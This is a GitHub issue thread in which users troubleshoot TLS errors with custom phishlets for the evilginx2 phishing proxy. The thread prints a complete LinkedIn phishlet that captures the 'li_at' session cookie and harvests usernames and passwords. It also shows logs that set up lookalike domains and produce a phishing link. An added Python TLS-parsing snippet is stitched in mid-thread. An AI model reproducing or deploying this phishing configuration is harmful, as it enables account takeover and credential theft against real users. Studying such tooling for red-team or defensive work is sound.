Closed anicec4t closed 5 years ago
More info?
I've done some phishlets for some client and when I test them Chrome gives me ERR_SSL_PROTOCOL_ERROR. In the framework console of evilginx2 there is no message like "new visitor".....
Can be because the phishlets are maybe not done right? or not complete?
What phishlets? What version? I have nothing to work with here.
evilginx version 2.0 the phishlet was created by me. it is not a phishlet already included in the framework
any clue how to check if my phishlet is done right so we can exclude that?
found out where the problem is. I will come up with a detailed view in a few minutes
Okay, so the problem is when you create new yaml phishlets using pico (as I did), after you save them pico adds an extra byte to the file, causing the evilginx server to act strange.
I tested as follows:
test 1: using the linkedin.yaml included in the framework - all went well
test 2: cat the linkedin.yaml and copy paste the output to a file called test2.yaml - both of the files looked the same when I did the cat - received the SSL error
Isn't it because you have two phishlets running with same configuration and evilginx sends a wrong cert for wrong domain? It would help if you pasted the full error.
This site can’t provide a secure connection
www.testtting-domain.online sent an invalid response.
ERR_SSL_PROTOCOL_ERROR
I'm sure there are more details to this error if you look carefully.
This is the full error. Tests were done using the same linkedin phishlet. Also, before activating the phishlet I did the phishlet disable name command.
Nope, that is the only error. Chrome does not show more details :(
Firefox gives: Secure Connection Failed
An error occurred during a connection to www.handler-mobile.online. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG
The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.
Output of evil..
[12:41:19] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets hostname sure handler-mobile.online
[12:41:33] [inf] phishlet 'sure' hostname set to: handler-mobile.online
[12:41:33] [inf] disabled phishlet 'sure'
: phishlets enable sure
[12:41:33] [inf] enabled phishlet 'sure'
[12:41:33] [inf] setting up certificates for phishlet 'sure'...
[12:41:33] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets get-url sure https://google.com/
If you have the sub_filters: not complete can that cause the error?
So you say that example phishlets work fine, but just not the one you made yourself? Phishlet validation is coming in version 2.2, which is a few weeks away.
This one used now is a copy paste of the included one of linkedin
What I was asking was: if I create a phishlet for x web site and for some reason I don't make it complete (let's say I don't add action= ..), can this be the cause of that error, in the case that the YAML file is written with the right syntax?
cbc8b6f0dd29a53c5487449d9501f540 linkedin.yaml
cbc8b6f0dd29a53c5487449d9501f540 sure.yaml
linkedin.yaml
name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'
sure.yaml
name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'
[12:58:03] [inf] setting up certificates for phishlet 'sure'...
[12:58:03] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets hostname sure handler-mobile.online
[12:58:10] [inf] phishlet 'sure' hostname set to: handler-mobile.online
[12:58:10] [inf] disabled phishlet 'sure'
: phishlets enable sure
[12:58:10] [inf] enabled phishlet 'sure'
[12:58:10] [inf] setting up certificates for phishlet 'sure'...
[12:58:10] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets get-url sure https://google.com/
https://www.handler-mobile.online/uas/login?yf=5dc0&ns=aHR0cHM6Ly9nb29nbGUuY29tLw%3D%3D
same error
Chrome:
This site can’t provide a secure connection
www.handler-mobile.online sent an invalid response.
ERR_SSL_PROTOCOL_ERROR
What phishlets do you have enabled when this error appears?
Hi, I used the linkedin one
Hey, I'm getting this error also with a custom phishlet I have been working on. I did a PCAP on my test machine and my evilginx server; it looks like the evilginx server is sending a 502 bad gateway response when the client sends the TLS Client Hello.
The issue appears on Chrome/Firefox on Mac/Windows hosts.
My evilginx is running on Ubuntu 18.04.1
Nothing is printed in the debug log, and the issue happens in normal mode as well as developer mode.
My phishlet is the only one enabled.
This is causing some head scratches between me and a few friends who have tried troubleshooting.
I would be happy to share my phishlet with you via PM or email, or any other information which can be helpful to you. It's possible the issue is in my phishlet; it's the first one I've written.
EDIT: Alright, looks like I solved this one right after posting. I love it when that happens! I was testing a few variations of my phishlet, each of them had the same name. As soon as I changed the phishlet name, it started working. Duplicate phishlet names=bad
So what you are saying is that if a phishlet is not done right and has the name "aaa", if you edit it and reload evilginx, it will give you the same error. So you have to rename it after the edit to aaa1, right?
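The capture described in the comment above (a plain HTTP 502 sent in answer to the ClientHello) is consistent with the Firefox error quoted earlier in the thread. This added example, which is not part of the thread or of evilginx2, reads the first five bytes of a reply as a TLS record header the way a client does; the byte strings are constructed samples and the function name is hypothetical.

```python
import struct

# TLS 1.2 record layer (RFC 5246, 6.2.3): a ciphertext fragment may not
# exceed 2^14 + 2048 bytes. Anything larger is a protocol violation.
MAX_TLS_CIPHERTEXT = 2**14 + 2048
TLS_CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert",
                     22: "handshake", 23: "application_data"}

# Constructed samples: a plaintext HTTP reply and the start of a TLS
# handshake record (type 22, version 3.3, length 0x005a).
SAMPLE_HTTP_502 = b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\n\r\n"
SAMPLE_TLS_HANDSHAKE = b"\x16\x03\x03\x00\x5a" + b"\x02" + b"\x00" * 89


def classify_first_bytes(data: bytes) -> dict:
    """Parse the 5-byte TLS record header at the start of a server reply."""
    if len(data) < 5:
        return {"verdict": "too_short"}
    # Header layout: content type (1), version major/minor (2), length (2).
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    result = {
        "content_type": ctype,
        "version": (major, minor),
        "length": length,
        "looks_like_http": data.startswith(b"HTTP/"),
    }
    if ctype in TLS_CONTENT_TYPES and major == 3 and length <= MAX_TLS_CIPHERTEXT:
        result["verdict"] = "tls_record"
    elif length > MAX_TLS_CIPHERTEXT:
        # "HTTP/" parses as type 0x48, version 0x5454, length 0x502f (20527),
        # which is over the limit: the record is "too long".
        result["verdict"] = "record_too_long"
    else:
        result["verdict"] = "not_tls"
    return result


if __name__ == "__main__":
    for name, sample in [("http_502", SAMPLE_HTTP_502),
                         ("tls_handshake", SAMPLE_TLS_HANDSHAKE)]:
        print(name, classify_first_bytes(sample))
```
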
@kafkaesqu3 Glad to hear that fixed it :)
Version 2.2.0 is adding a lot of phishlet validation, but it seems I need to also add a check for duplicate phishlet names. Thanks.
I think it is wiser to just remove the name variable from phishlet file format and instead rely on the name of the filename without .yaml extension. Filenames will provide the uniqueness which is required and will decrease the confusion, making it all less error prone for phishlet creators.
Too easy to make this mistake now.
The phish link is responding with "ERR_SSL_PROTOCOL_ERROR" in chrome for different web sites... any clues?